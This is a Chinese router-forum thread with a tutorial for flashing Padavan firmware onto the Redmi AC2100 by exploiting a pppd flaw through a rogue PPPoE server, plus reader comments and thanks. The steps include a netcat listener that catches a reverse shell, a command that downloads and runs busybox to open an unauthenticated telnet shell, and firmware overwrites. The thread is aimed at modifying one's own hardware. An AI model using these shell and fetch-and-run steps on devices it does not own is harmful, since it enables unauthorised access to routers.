QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[AC2100(RM2100)] [2020-05-07]padavan适配红米AC2100,更新单网卡视频刷机教程

火... [复制链接]

请删除微博,谢谢

录了个视频,有需要的可以看一下:https://www.bilibili.com/video/BV1Sk4y1r7H1/楼下有pppoe和scapy等都配置好了的虚拟机打包下载,方便软件源下载困难的人士使用。

小米官网之前的救砖工具红米依然可用,所以随便刷。
设置红米为pppoe拨号,用户名name,密码passwd。用一根网线将红米的wan和紧邻的lan连接,另一根网线连接电脑和剩下一个紧邻的lan(别连到最边上那个)
剩余流程:(用我上传的虚拟机的直接从第二步开始)
1.虚拟机ubuntu20运行sudo apt-get install python3-scapy&&sudo apt install net-tools        并建好pppoe服务器(参考7楼)。
将2楼网盘内的busybox和pppd-cve.py(里面的eth0改为自己的有线网卡名,可用ifconfig测试,如图里我的是ens33)还有剩余的两个固件放到ubuntu任一目录。

2.用我传的虚拟机的可以直接从这开始
有线网卡设置固定ip为192.168.31.177,改ip后记得开关下网卡。在下载目录打开命令行窗口,运行python3 -m http.server 8081 & 建立http服务器。用手机看看 http://192.168.31.177:8081/能否正常打开 ,不能打开就自行检查防火墙,再考虑后面的
该目录打开窗口运行sudo pppoe-server -I ens33 -L 192.168.5.1 -R 192.168.5.5 -N 10 路由器能拨上号后再考虑后面的。
再次打开窗口,运行nc -nvlp 31337
再次打开窗口,运行sudo python3 pppd-cve.py 此时注意运行nc-nvlp 31337的窗口,一但收到连接立刻在nc的窗口里运行(一定要先运行nc再运行python脚本)
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
运行成功如图

如果连接中途断开,则重复运行上面最后两步(指python和nc-nvlp两个窗口)。完成后运行telnet 192.168.31.1,依次运行
wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write r3g.bin kernel1

运行完成后会进入op(用户名root 密码admin)此时可切换到windows。如果拿不到ip,请手动设置有线网卡ip为192.168.1.23,网关为192.168.1.1,网关掩码255.255.255.0。winscp将老毛子固件传到tmp目录下,用putty之类的连路由器运行
mtd -r write /tmp/redmi.trx kernel

自动重启进入老毛子。

5G可开160MHZ

速度如下

固件主要集成了网易云和低调上网

你说的很对,我赞同你的说法。: 5.0
你说的很对,我赞同你的说法。: 5
大佬你好,小米路由负责人想和您认识一下,看到的话,可以点进这个链接去微博和他联系。https://weibo.com/1685482501/JccWir6ju?type=comment&pcfrom=msgbox#_r   发表于 2020-7-21 12:19
大佬你好,小米路由负责人想和您认识一下,看到的话,可以点进这个链接去微博和他联系。https://weibo.com/1685482501/Jcc ... x#_rnd1595304773196  发表于 2020-7-21 12:17
加入锐捷认2证后的版本,有明显掉速,你应该更改过什么。我换回原来的版本速度正常  发表于 2020-4-30 19:17
大佬,如果149-161信道的无线,调成和36-48鸡血一样屌,那就真的成一代神机了。请问编译的时候可以做到吗?  发表于 2020-4-27 23:00
你说的很对,我赞同你的说法。: 5
实测数据吊打K2P,数据细节已在我帖子更新,欢迎来讨论!  发表于 2020-4-27 19:58

评分

血*** + 1 送你一块“恩山”牌肥皂,喏,就在你脚下、捡一下吧……
yu*** + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
rodney*** + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
这波*** + 1 强大的恩山!(以下重复1万次)
sid*** + 1 学习到
A六度*** -1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
rn*** + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
Poil_G*** + 1 生活不易,相遇也不易,既然这样,让我们成为朋友一起面朝大海、花开花落……
andyc*** + 1 什么时候加多拨就完美了....
byxi*** + 1 一看就是觉得高端、大气、上档次!
ben*** + 1 恩山全体路由党向你学习!
i*** + 1 恩山全体路由党向你学习!
kkbbk*** + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
狐狸*** + 1 按照新教程很快就刷好固件了,大神真是牛
2971*** + 1 ss节点不能启用要怎么搞
kol*** + 1 强大的恩山!(以下重复1万次)
kele*** + 1 一看就是觉得高端、大气、上档次!
二到*** + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
hon*** + 1 一晚上终于搞定 还是两台电脑比较容易
jz*** + 1 血洗X讯啊
1c*** + 1 请问使用的是什么版本的padavan
408*** + 1 网安大神牛逼
511*** + 1 利用了CVE-2020-8597,不知ax3600是否可以效仿
awp*** + 1 给力,加油
8MI*** + 1 How ever,this is JB useful!
han*** + 1 2333
青*** + 1 恩山全体路由党向你学习!

我的恩山、我的无线 The best wifi forum is right here.
 楼主| | 显示全部楼层

https://blog.csdn.net/rheostat/article/details/806977 桥接参考这个。运行以下命令可安装pppoe服务器,启动前用网盘文件夹pppoe文件夹的内容替换/etc/ppp下的三个文件。(运行sudo nautilus,用这个文件管理器替换)
wget -c https://dianne.skoll手动替换为点ca/projects/rp-pppoe/download/rp-pppoe-3.13.tar.gz

sudo tar zxvf rp-pppoe-3.13.tar.gz -C /opt/
sudo chown -R root:root /opt/rp-pppoe-3.13/

sudo apt-get install build-essential

sudo /opt/rp-pppoe-3.13/go (这步一路回车,防火墙那好像选0好点)

sudo killall pppoe-server
sudo pppoe-server -I ens33 -L 192.168.5.1 -R 192.168.5.5 -N 10 (ens33改为自己的网卡名)

我的恩山、我的无线 The best wifi forum is right here.

C:\Users\14697\Pictures\Screenshots\屏幕截图 2024-04-15 200526.png
大佬这个是怎么回事

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

大佬,能不能再传一下视频,实在不会作

实施看吧也不知道咋样

谢谢分享

chenjinhuang 发表于 2021-12-27 01:37
主持楼主,先用看看

能在发一下资源的链接吗,过期了

前台占位,坐等进一步的详细说明

给力,加油

红米ax1800能用这个方法吗?

感同身受   慢慢学习吧

我的红米ac2100  现在breed进不去 应该是被我刷坏了  路由器停留在第三方版本 能正常工作  有什么办法 恢复breed 或者回滚到原厂的版本>?

工具链接没有了,可以麻烦大佬补下档吗?

来自手机 | 显示全部楼层
237176253 发表于 2020-4-24 22:15
配好环境的ubuntu,密码739870,个人用的虚拟机是VMware 15.5 pro.有关脚本和固件在download目录内
链接:  ...

主持楼主,先用看看

能在发一下资源的链接吗,过期了  详情 回复 发表于 2023-4-30 18:07

阿斯达斯多种风格辅导班

对有线影响不大吧